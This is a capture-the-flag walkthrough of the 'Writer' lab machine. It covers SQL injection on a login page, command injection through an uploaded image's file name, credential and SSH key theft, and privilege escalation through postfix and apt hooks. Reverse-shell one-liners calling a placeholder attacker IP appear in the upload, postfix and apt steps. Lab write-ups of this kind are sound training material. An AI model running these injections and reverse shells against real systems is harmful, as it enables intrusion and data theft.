1. IP Address

# Machine Address
10.10.11.101

# Local Address
10.10.14.31

2. Nmap

sudo nmap -sC -sV -oA nmap/writer 10.10.11.101
# Nmap 7.91 scan initiated Fri Sep  3 10:52:33 2021 as: nmap -sC -sV -oA nmap/writer 10.10.11.101
Nmap scan report for 10.10.11.101
Host is up (0.21s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d (RSA)
|   256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 (ECDSA)
|_  256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Story Bank | Writer.HTB
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 13m54s
|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-03T15:06:47
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep  3 10:52:58 2021 -- 1 IP address (1 host up) scanned in 25.18 seconds

3. Gobuster

gobuster dir -u http://10.10.11.101 -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -o gobuster.out
/contact              (Status: 200) [Size: 4905]
/logout               (Status: 302) [Size: 208] [--> http://10.10.11.101/]
/about                (Status: 200) [Size: 3522]
/static               (Status: 301) [Size: 313] [--> http://10.10.11.101/static/]
/.                    (Status: 200) [Size: 11976]
/dashboard            (Status: 302) [Size: 208] [--> http://10.10.11.101/]
/server-status        (Status: 403) [Size: 277]
/administrative       (Status: 200) [Size: 1443]

administrative

4. SQLMap

Tried SQL injection; it did not log in:

'or 1=1 -- -

So I saved the login request from Burp as a file:

POST /administrative HTTP/1.1
Host: 10.10.11.101
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: http://10.10.11.101
DNT: 1
Connection: close
Referer: http://10.10.11.101/administrative
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

uname=admin&password=admin

Terminal:

sqlmap -r login.req --level 5 --risk 3 --threads 10

Result:

---
Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: uname=-1182' OR 8638=8638-- ITHB&password=admin
---

Testing

sqlmap -r login.req --dump-all

Reading further, it did not return anything useful. I took the useful output and logged in.

5. Image Upload

init.py

import os
import urllib.request

import PIL
from PIL import Image
from flask import request, render_template

# Fragment of the upload handler as found on the box (indentation normalised, imports
# added). The file name returned by urlretrieve is interpolated into shell commands.
if request.form.get('image_url'):
    image_url = request.form.get('image_url')
    if ".jpg" in image_url:
        try:
            local_filename, headers = urllib.request.urlretrieve(image_url)
            os.system("mv {} {}.jpg".format(local_filename, local_filename))
            image = "{}.jpg".format(local_filename)
            try:
                im = Image.open(image)
                im.verify()
                im.close()
                image = image.replace('/tmp/', '')
                os.system("mv /tmp/{} /var/www/writer.htb/writer/static/img/{}".format(image, image))
                image = "/img/{}".format(image)
            except PIL.UnidentifiedImageError:
                os.system("rm {}".format(image))
                error = "Not a valid image file!"
                return render_template('add.html', error=error)
        except Exception:
            # the except clause of this outer try was cut off in the extract; assumed generic
            pass

Image upload is done in the post section.

echo -n "bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'" | base64
touch '1.jpg; `echo <BASE64 ENCODED PAYLOAD> | base64 -d | bash `;'

After preparing it, re-upload the image in the stories section. Check whether it landed by looking in static/img; if it did, this time pass the request through Burp and change the image_url field. In the image name field I removed the part after the jpg.

file:///var/www/writer.htb/writer/static/img/1.jpg; `echo <BASE64 ENCODED PAYLOAD> | base64 -d | bash `;

6. Enumeration

Check the services:

ss -tupln

The username and password can be read from /etc/mysql/mariadb.cnf.

www-data@writer:$ cd /etc/mysql
www-data@writer:/etc/mysql$ ls
conf.d
debian-start
debian.cnf
mariadb.cnf
mariadb.conf.d
my.cnf
my.cnf.fallback
www-data@writer:/etc/mysql$ cat mariadb.cnf
# The MariaDB configuration file
#
# The MariaDB/MySQL tools read configuration files in the following order:
# 1. "/etc/mysql/mariadb.cnf" (this file) to set global defaults,
# 2. "/etc/mysql/conf.d/*.cnf" to set global options.
# 3. "/etc/mysql/mariadb.conf.d/*.cnf" to set MariaDB-only options.
# 4. "~/.my.cnf" to set user-specific options.
#
# If the same option is defined multiple times, the last one will apply.
#
# One can use all long options that the program supports.
# Run program with --help to get a list of available options and with
# --print-defaults to see which it would actually understand and use.

#
# This group is read both both by the client and the server
# use it for options that affect everything
#
[client-server]

# Import all .cnf files from configuration directory
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/

[client]
database = dev
user = djangouser
password = DjangoSuperPassword
default-character-set = utf8

Finding Kyle's password:

mysql -u djangouser -h 127.0.0.1 -p
DjangoSuperPassword

show databases;

use dev;

show tables;

SELECT * FROM auth_user;

pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A=

It can apparently be cracked with hashcat. Since I did not know how, I used the already cracked word. (marcoantonio)

From Kyle to John

ssh kyle@writer.htb

Send a mail to trigger the disclaimer script and put a reverse shell inside it: /etc/postfix/disclaimer

bash -i &>/dev/tcp/<YOUR IP>/<PORT> 0>&1
INSPECT_DIR=/var/spool/filter
SENDMAIL=/usr/sbin/sendmail

The first line is what does the triggering.

#!/usr/bin/env python3

import smtplib

host = '127.0.0.1'
port = 25

From = 'kyle@writer.htb'
To = 'john@writer.htb'

# Header lines must start in column 0; a leading space would be read as a folded header.
Message = '''\
Subject: HI THERE! JOHN

OOPS I GOT YOU MATE.
'''

io = None
try:
    io = smtplib.SMTP(host, port)
    io.ehlo()
    io.sendmail(From, To, Message)
except Exception as e:  # was "Exceptions", which is not a Python name
    print(e)
finally:
    if io is not None:
        io.quit()

python3 script.py

Start nc and wait for the connection as John. Once in as John, grab id_rsa. Copy it over, chmod 600 it before using ssh, and log in.

ssh -i id_rsa john@writer.htb

John can write to /etc/apt/apt.conf.d, since he is in the management group.

Set up pspy64s. Local:

mkdir www
cd www
mv ~/dir/pspy64s .
python3 -m http.server

Machine:

curl <local ip>:8000/pspy64s -o pspy64s
chmod +x pspy64s
./pspy64s

7. Exploitation

https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/

echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR IP> <PORT> >/tmp/f"};' > /etc/apt/apt.conf.d/00-pwn